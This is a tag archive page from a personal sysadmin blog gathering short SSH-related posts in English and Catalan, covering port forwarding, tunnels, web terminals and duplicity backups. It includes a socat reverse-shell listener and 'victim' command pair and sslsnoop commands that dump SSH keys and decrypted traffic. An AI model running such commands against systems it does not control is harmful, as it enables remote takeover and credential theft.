oriolrius.cat

Des del 2000 compartiendo sobre…

Tag: ssh

OpenSSH public key fingerprint

Reading time: < 1 minute

Quick and easy, how to get the fingerprint of your SSH RSA key.

# syntax:
openssl pkey -in PATH/PRIVATE_RSA_KEY -pubout -outform DER | openssl md5 -c

# example:
$ openssl pkey -in ~/.ssh/id_rsa -pubout -outform DER | openssl md5 -c
MD5(stdin)= a6:26:23:d9:c1:d3:d5:e5:c0:38:ab:3c:c1:6a:3f:ea

socat reminder: reverse shell

Reading time: < 1 minute

#Listener:
socat file:`tty`,raw,echo=0 tcp-listen:12345

#Victim:
socat exec:’bash -li’,pty,stderr,setsid,sigint,sane tcp:IP_LISTENER:12345

Restricted user for SSH port forwarding

Reading time: 2 – 2 minutes

I love “ssh -R” reverse SSH is really useful when you have to get access to a Linux machine behind a NAT or firewall. One of the most powerful scenarios to get that running is use a third machine with a public IP address. The idea will be run reverse SSH command in target Linux and publish a forward port at the third server, so you only have to connect to a published port in that third server and you’ll get the target Linux thanks to the reverse SSH connection open between them.

reverse-ssh-schema

A long time ago I talked about that in my podcast “2×04 SSH avançat“.

With this scenario we have a security challenge with the SSH user account on the “third server”, we want a secure user:

 • without shell and sftp access
 • secure enough to only allow port forwarding features
 • access only allowed with authorized keys

I’m not going to give precise Linux instructions on that limited user, but for user you’re not going to have problems to get that:

/etc/passwd(-):

limited-user:x:1001:1001::/home/limited-user:

/etc/shadow(-):

limited-user:!:17037:0:99999:7:::

/etc/ssh/sshd_config:

Match User limited-user
  GatewayPorts yes
  ForceCommand echo 'This account can only be used for maintenance purposes'

Of course, you’ll have your own UID, GID and use your own username. And at “/home/limite-user/.ssh/authorized_ssh” you’ll have to pub public key of the clients that want to use the service.

I’ve got my inspiration to get that from: How to create a restricted SSH user for port forwarding?. Thank you askubnutu.com.

Small recap of web shell applications

Reading time: 2 – 2 minutes

Lately I found some useful web applications that publish a terminal application. This is very useful when you are traveling or you have a remote server which you want to maintain or access from anywhere. Also another interesting use of this kind of applications is as a terminal for embedded devices.

I tried to use them as my default applications but all of them have the same problem: keyboard shortcuts conflict with the browser. I’m very used to use a lot of shortcuts to manage my terminal application and remote shell and this is a problem because most of the shortcuts are redefined by your browser. May be it’s possible to disable browser shortcuts when you are using this kind of web applications but I didn’t find how.

I hope this small list is as much useful for you as it is for me:

 • Wetty = Web + tty (the best one IMHO)

wetty

ajaxterm

anyterm

gateone

sslsnoop – hacking OpenSSH

Reading time: < 1 minute Using sslsnoop you can dump SSH keys used in a session and decode ciphered traffic. Supported algorithms are: aes128-ctr, aes192-ctr, aes256-ctr, blowfish-cbc, cast128-cbc. Basic sslsnoop information:

 $ sudo sslsnoop # try ssh, sshd and ssh-agent… for various things
 $ sudo sslsnoop-openssh live `pgrep ssh` # dumps SSH decrypted traffic in outputs/
 $ sudo sslsnoop-openssh offline –help # dumps SSH decrypted traffic in outputs/ from a pcap file
 $ sudo sslsnoop-openssl `pgrep ssh-agent` # dumps RSA and DSA keys

Take a look into the project in sslsnoop github page.

Setup a VPN with PPP and SSH

Reading time: < 1 minute Fast trick for linux users, do you know how to setup a VPN using PPP and SSH? of course you can setup a secure tunnel using '-w- or '-W' ssh parameters in last versions of SSH. But in this case I want to share with you this idea:

pppd updetach pty “ssh root@REMOTE_PUB_IP pppd notty 192.168.254.1:192.168.254.2”

I hope it’s useful for you.

ssh-copy-id

Reading time: < 1 minute Really useful command of ssh package to add public key of your user account to a remote SSH server and then access there with passwordless authentication method. ssh-copy-id [-i [identity_file]] [user@]machine

In the past I wrote a simple cookbook to explain this process but now this is as simple as possible. Don’t forget ssh-copy-id is the most easy way to add your ssh public key in remote servers.

Podcast 2×04: SSH avançat

Reading time: 3 – 5 minutes

El podcast

[display_podcast]

Notes sobre el podcast

 • -L: connecta per SSH a un HOST Un cop allà obre una connexió TCP a un altre HOST:PORT i obre un port TCP local que al connectar-hi ens envia al HOST:PORT anteriors, o sigui, portforwarding.
  • -L [bind_address:]port:host:hostport]
 • -W: connecta per SSH a un HOST un cop allà obre una connexió TCP a un altre HOST:PORT i ens retorna a la stdin/stdout el contingut d’aquest darrer enllaç TCP
  • -W host:hostport
 • -R publicar un port: connecta per SSH a un host i un cop allà publica un port TCP, quan un client es connecta a aquest port TCP accedeix per SSH a la màquina que ha llença l’enllaç SSH i obre un altre enllaç TCP a una altre IP:PORT.
  • -R[bind_address:]port:host:hostport
 • -D socks5: connecta per SSH a un HOST i després publica un port SOCKS5/TCP, és a dir, que podem connectar a aquest port local i sortir a internet a través de la IP del HOST on hem connectat per SSH
  • -D [bind_address:]port
 • -w tunel: connecta per SSH a un HOST i el socket que s’ha usat per fer l’enllaç SSH es connecta a dues interficies de tipus TUN, una a cada extrem del socket. Així doncs, si configurem les corresponents IPs a les interficies TUN tenim un tunel/VPN montada entre els extrems.
  • -w local_tun[:remote_tun]

HPN-SSH

La web de: HPN-SSH -> especialment interessant: Dynamic Windows and None Cipher

 • treballa amb mida de finestra dinàmica
 • treballa sense xifrat quan un enllaç no té terminal associat, sovint usat per pas de fitxers

Les proves:

 • Openssh 5.3p1 + hpn-13 (només el patch: Dynamic Windows and None Cipher)
 • després d’aplicar el patch: openssh5.3-dynwindow_noneswitch.diff.gz
 • modifiquem el fitxer: sshconnect2.c
  linia: 366
  - 		if (!tty_flag) /* no null on tty sessions */
  + 		if (1) /* no null on tty sessions */
 • així podem fer SSH sense xifrar només després d’haver fet el login.

exemple ampla de banada d’un SSH amb xifrat aes128-ctr, usant finestra dinàmica:

scp -v -oNoneEnabled=no -oNoneSwitch=yes fitxer root@127.0.0.1:/tmp/ssh
o
ssh -v -oNoneEnabled=no -oNoneSwitch=yes root@127.0.0.1 "dd if=/dev/zero"|pv > /dev/null

velocitat de transferència: 13.7MB/s
 • debug ciphers, una única negociació de ciphers:
  debug1: AUTH STATE IS 0
  debug1: REQUESTED ENC.NAME is 'aes128-ctr'
  debug1: kex: server->client aes128-ctr hmac-md5 none
  debug1: REQUESTED ENC.NAME is 'aes128-ctr'
  debug1: kex: client->server aes128-ctr hmac-md5 none
  

exemple sense xifrat, usant finestra dinàmica:

scp -v -oNoneEnabled=yes -oNoneSwitch=yes fitxer root@127.0.0.1:/tmp/ssh
o
ssh -v -oNoneEnabled=yes -oNoneSwitch=yes root@127.0.0.1 "dd if=/dev/zero"|pv > /dev/null

velocitat de transferència: 37.4MB/s
 • abans del pass de login:
 • debug1: AUTH STATE IS 0
  debug1: REQUESTED ENC.NAME is 'aes128-ctr'
  debug1: kex: server->client aes128-ctr hmac-md5 none
  debug1: REQUESTED ENC.NAME is 'aes128-ctr'
  debug1: kex: client->server aes128-ctr hmac-md5 none
  
 • després d’autenticar-se:
 • debug1: AUTH STATE IS 1
  debug1: REQUESTED ENC.NAME is 'none'
  debug1: Requesting NONE. Authflag is 1
  debug1: None requested post authentication.
  debug1: kex: server->client none hmac-md5 none
  debug1: REQUESTED ENC.NAME is 'none'
  debug1: Requesting NONE. Authflag is 1
  debug1: None requested post authentication.
  debug1: kex: client->server none hmac-md5 none
  

Proxytunnel: connecta un socket a través d’un proxy HTTP i HTTPs

Reading time: 2 – 2 minutes

Descrirure tècnicament el que fa proxytunnel és força senzill, ja que l’únic que fa és connectar l’entrada i sortides estàndard a través d’un socket que va del client al servidor a través d’un servidor proxy HTTP o HTTPs; soportant autenticació de diversos tipus en el servidor proxy.
Gràcies a aquesta funcionalitat tan simple es pot aplicar en infinitat de llocs, per exemple, com a backend d’OpenSSH per tal de poder fer connexions SSH a través d’un proxy HTTP. Això si el proxy haurà de suportar el mètode CONNECT.
Un cop ha establert la connexió amb l’extrem desitjat publica un port a través del qual ens podem connectar a través d’un client TCP convencional i enviar/rebre dades de l’altre extrem del túnel.
Quan treballem sobre proxies HTTP aquests no poden fer inspecció de continguts de capa 7 sinó s’adonaran que el tràfic qeu es passa no és legítim, encanvi si fem el túnel sobre HTTPs això no e un problema ja que no es pode inspeccionar les dades que van per sobre de la capa 4 al anar xifrades.
També cal pensar que és habitual que si el mètode CONNECT, que ha de ser suportat pel proxy esta habilitat (cosa rara que passi) segurament estarà restringit a connectar-se al port 80, 8080 i 443 remots, com a molt. Així doncs, si el que volem és fer una connexió SSH el que hem de fer és publicar el servidor SSH per algún d’aquests ports.
Si esteu interessats en aplicar la solució de la connexió SSH sobre proxy HTTP/s ús recomano seguir el manual que hi ha a la pàgina: DAG WIEERS: Tunneling SSH over HTTP(S).

duplicity: còpies de seguretat senzilles i potents des de la CLI

Reading time: 3 – 4 minutes

Duplicity és un aplicatiu basat en python que de moment no disposa de frontend gràfic, sinó com les coses bones de la vida s’usa des de CLI. Esta orientat a les còpies de seguretat i la seva principal potència resideix en recolzar-se amb rdiffdir/rdiff/rsync per fer còpies de seguretat diferencies/incrementals. Això sembla que no sigui cap tret diferencial si no fos perquè suporta una bona colla de sistemes on enmagatzemar les còpies:

 • ssh/scp
 • local file access
 • rsync
 • ftp
 • HSI
 • WebDAV
 • Amazon S3

De moment ja he pogut comprovar que tan via Amazon S3 com via FTP, funciona la mar de bé. Això com podeu verure ja té més història, ja que fer un sistema de còpies diferencies i/o incrementals contra un FTP o contra S3, no és trivial. A més esta fet seguint tots els estàndards, és eficient en la gestió d’ampada de banda i suporta xifrat per clau pública i clau privada.

A continuació adjunto un petit cookbook dels paràmetres que jo més uso:

  • Fer un backup contra un FTP de tot el sistema, el backup es farà incremental sempre que la còpia incremental més vella no tingui més de 7 dies llavors es farà una còpia ‘full’. S’indica que els fitxers que es pujaran a l’FTP tenen una mida de 10Mb. No es copiaran els directoris /dev, /proc, /tmp, /mnt, /media
PASSPHRASE=clausimetrica duplicity incremental --full-if-older-than 7D -v4 --volsize 10 --exclude=/dev --exclude=/proc --exclude=/tmp --exclude=/mnt --exclude=/media / ftp://user:pass@hostname
  • Veure un llistat dels fitxers sobre els que hem fet còpia:
PASSPHRASE=clausimetrica duplicity list-current-files ftp://user:pass@hostname
  • Consultar quines còpies hi ha disponibles al repositori:
PASSPHRASE=clausimetrica duplicity collection-status ftp://user:pass@hostname

Per restaurar les còpies de seguretat, cal pensar que sovint el que es vol és recuperar algún fitxer o directori i no pas tota la còpia. Així doncs aquí es tindran en compte aquests detalls.

  • Recuperem tota la còpia de seguretat sencera:
PASSPHRASE=clausimetrica duplicity ftp://user:pass@hostname /tmp/restore
  • Recuperem un fitxer o directori:
PASSPHRASE=clausimetrica duplicity --file-to-restore nom_fitxer_o_directori_a_recuperar ftp://user:pass@hostname /tmp/restore
  • Recuperem un fitxer o directori concrets de fa 3 dies enrera:
PASSPHRASE=clausimetrica duplicity -t 3D --file-to-restore nom_fitxer_o_directori_a_recuperar ftp://user:pass@hostname /tmp/restore

Com podeu comprovar l’ús de l’eina és ben senzill i fàcil de col·locar dins d’un crontab, però realment si ús calen combinacions més complexes cal que doneu un bon cop d’ull al man duplicity.

UPDATE (2015/08/17) How to install duplicity on Ubuntu 12.04

apt-get install -y python-paramiko python-gobject-2 python-dev build-essential python-pip python-software-properties
add-apt-repository ppa:duplicity-team
apt-get update
apt-get install -y duplicity

UPDATE (2016/08/02) Backup full Ubuntu Linux

PASSPHRASE=your_password duplicity incremental --full-if-older-than 7D -v4 --volsize 10 --exclude={"/dev/*","/proc/*","/sys/*","/tmp/*","/run/*","/mnt/*","/media/*","/lost+found"} / rsync://the_user:the_password@host_server::/path/